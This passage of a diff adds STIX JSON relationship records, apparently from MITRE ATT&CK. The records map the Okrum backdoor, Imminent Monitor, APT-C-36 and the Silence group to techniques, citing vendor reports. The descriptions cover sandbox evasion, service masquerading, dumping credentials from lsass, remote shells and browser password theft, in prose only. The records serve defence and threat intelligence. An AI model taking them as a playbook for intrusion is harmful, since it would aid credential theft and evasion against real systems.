+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439)'s loader can decrypt the backdoor code, embedded within the loader or within a legitimate PNG file. A custom XOR cipher or RC4 is used for decryption.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--b3f66735-fafe-49be-b55c-4d087d1351a7",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.642Z",
+ "created": "2020-05-06T21:31:07.642Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439)'s loader can check the amount of physical memory and terminates itself if the host has less than 1.5 Gigabytes of physical memory in total.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--108e61c1-83fc-4ebf-aa5c-4ff19ccbe7cf",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.631Z",
+ "created": "2020-05-06T21:31:07.631Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "Data exfiltration is done by [Okrum](https://attack.mitre.org/software/S0439) using the already opened channel with the C2 server.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--743a0baf-8d6d-4e4a-a72b-0413a5d49594",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.549Z",
+ "created": "2020-05-06T21:31:07.549Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) can collect computer name, locale information, and information about the OS and architecture.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--702ed555-03e2-4660-82d8-e85d46cbec02",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.650Z",
+ "created": "2020-05-06T21:31:07.650Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) was seen using NetSess to discover NetBIOS sessions.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--ce48fd88-9fed-44d6-864f-07d8994c89d2",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.582Z",
+ "created": "2020-05-06T21:31:07.582Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) can collect network information, including the host IP address, DNS, and proxy information.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--39897b0a-f48b-4d3b-8ba0-d6f8f26d00d4",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.605Z",
+ "created": "2020-05-06T21:31:07.605Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) has used DriveLetterView to enumerate drive information.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8908a544-e6b6-485a-8251-6c8dd1fbc040",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.624Z",
+ "created": "2020-05-06T21:31:07.624Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) can establish persistence by adding a new service NtmsSvc with the display name Removable Storage to masquerade as a legitimate Removable Storage Manager.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--65f315be-e62d-44a5-b21a-7211041a75bb",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.654Z",
+ "created": "2020-05-06T21:31:07.654Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) can impersonate a logged-on user's security context using a call to the ImpersonateLoggedOnUser API.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--874148d5-d7cb-43c2-905f-1582f90005f6",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.657Z",
+ "created": "2020-05-06T21:31:07.657Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) can obtain the date and time of the compromised system.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--e6f9ae1e-7002-4c62-be60-f45eca42061e",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.647Z",
+ "created": "2020-05-06T21:31:07.647Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has uploaded a file containing debugger logs, network information and system information to the C2.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--aac7b4ce-93ee-4feb-83da-3b2600ad75b0",
+ "type": "relationship",
+ "modified": "2020-05-07T02:33:06.795Z",
+ "created": "2020-05-07T02:33:06.795Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has encrypted the spearphish attachments to avoid detection from email gateways; the debugger also encrypts information before sending to the C2.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c3aa5639-a8e1-4de3-8f39-cc98593973ed",
+ "type": "relationship",
+ "modified": "2020-05-11T17:17:00.379Z",
+ "created": "2020-05-07T02:33:06.892Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "source_name": "Imminent Unit42 Dec2019",
+ "url": "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/",
+ "description": "Unit 42. (2019, December 2). Imminent Monitor \u2013 a RAT Down Under. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has a feature to disable Windows Task Manager.(Citation: Imminent Unit42 Dec2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--ff6d64fb-c41c-409b-91b0-e4fb9d9edba1",
+ "type": "relationship",
+ "modified": "2020-05-07T02:33:06.900Z",
+ "created": "2020-05-07T02:33:06.900Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has leveraged CreateProcessW() call to execute the debugger.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--106cf74b-91d6-4348-91ae-48d1a42abb73",
+ "type": "relationship",
+ "modified": "2020-05-07T02:33:06.912Z",
+ "created": "2020-05-07T02:33:06.912Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has deleted files related to its dynamic debugger feature.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2f0fee17-1cd1-45dd-a1e0-f854c03ed064",
+ "type": "relationship",
+ "modified": "2020-05-07T02:33:06.926Z",
+ "created": "2020-05-07T02:33:06.926Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has a CommandPromptPacket and ScriptPacket module(s) for creating a remote shell and executing scripts.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--45c4d1f9-414f-4542-8272-c783f7314514",
+ "type": "relationship",
+ "modified": "2020-05-07T22:39:23.978Z",
+ "created": "2020-05-07T02:33:06.936Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has decoded malware components that are then dropped to the system.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--239cb026-369a-43f0-922c-cdc38d124430",
+ "type": "relationship",
+ "modified": "2020-05-07T02:33:06.943Z",
+ "created": "2020-05-07T02:33:06.943Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has a PasswordRecoveryPacket module for recovering browser passwords.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--14307b7b-0837-4c15-a959-0c8d24e05b6b",
+ "type": "relationship",
+ "modified": "2020-05-07T02:33:07.057Z",
+ "created": "2020-05-07T02:33:07.057Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842",
+ "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[APT-C-36](https://attack.mitre.org/groups/G0099) has disguised its scheduled tasks as those used by Google.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5cabd775-7d78-4150-b529-bb8cfb747013",
+ "type": "relationship",
+ "modified": "2020-05-07T03:04:14.719Z",
+ "created": "2020-05-07T03:04:14.719Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6713ab67-e25b-49cc-808d-2b36d4fbc35c",
+ "target_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--0ee0af6e-c913-406e-9439-f40f5102cae7",
+ "type": "relationship",
+ "modified": "2020-05-07T18:49:44.782Z",
+ "created": "2020-05-07T18:49:44.782Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[APT-C-36](https://attack.mitre.org/groups/G0099) has embedded a VBScript within a malicious Word document which is executed upon the document opening.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d4922804-7216-4e83-b0c0-6e61b09d5fc0",
+ "type": "relationship",
+ "modified": "2020-05-07T22:32:37.695Z",
+ "created": "2020-05-07T22:32:37.695Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[APT-C-36](https://attack.mitre.org/groups/G0099) has downloaded binary data from a specified domain after the malicious document is opened.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c3bedbae-b1e1-4a35-8c59-d181dca093e4",
+ "type": "relationship",
+ "modified": "2020-05-07T22:53:31.241Z",
+ "created": "2020-05-07T22:53:31.241Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used compromised credentials to log on to other systems and escalate privileges.(Citation: Group IB Silence Sept 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--9569bfcd-38f8-4cb7-8470-a473ea9e4328",
+ "type": "relationship",
+ "modified": "2020-05-08T17:01:36.095Z",
+ "created": "2020-05-08T17:01:36.095Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has named its backdoor \"WINWORD.exe\".(Citation: Group IB Silence Sept 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--e3038b75-63f6-44c2-9645-673bbf0ffa3b",
+ "type": "relationship",
+ "modified": "2020-05-08T17:01:36.105Z",
+ "created": "2020-05-08T17:01:36.105Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) can create, delete, or modify a specified Registry key or value.(Citation: Group IB Silence Sept 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--396a5415-67aa-4ec6-ae27-6be641d69e15",
+ "type": "relationship",
+ "modified": "2020-05-08T17:01:36.122Z",
+ "created": "2020-05-08T17:01:36.122Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used the Farse6.1 utility (based on [Mimikatz](https://attack.mitre.org/software/S0002)) to extract credentials from lsass.exe.(Citation: Group IB Silence Sept 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--a9c366b6-270d-4884-86dd-7c048460741b",
+ "type": "relationship",
+ "modified": "2020-05-13T19:31:54.362Z",
+ "created": "2020-05-08T17:01:36.126Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used Nmap to scan the corporate network, build a network topology, and identify vulnerable hosts.(Citation: Group IB Silence Sept 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a6dc02a8-2ce3-45db-a7e5-e475d6acec3c",
+ "type": "relationship",
+ "modified": "2020-05-08T17:01:36.139Z",
+ "created": "2020-05-08T17:01:36.139Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
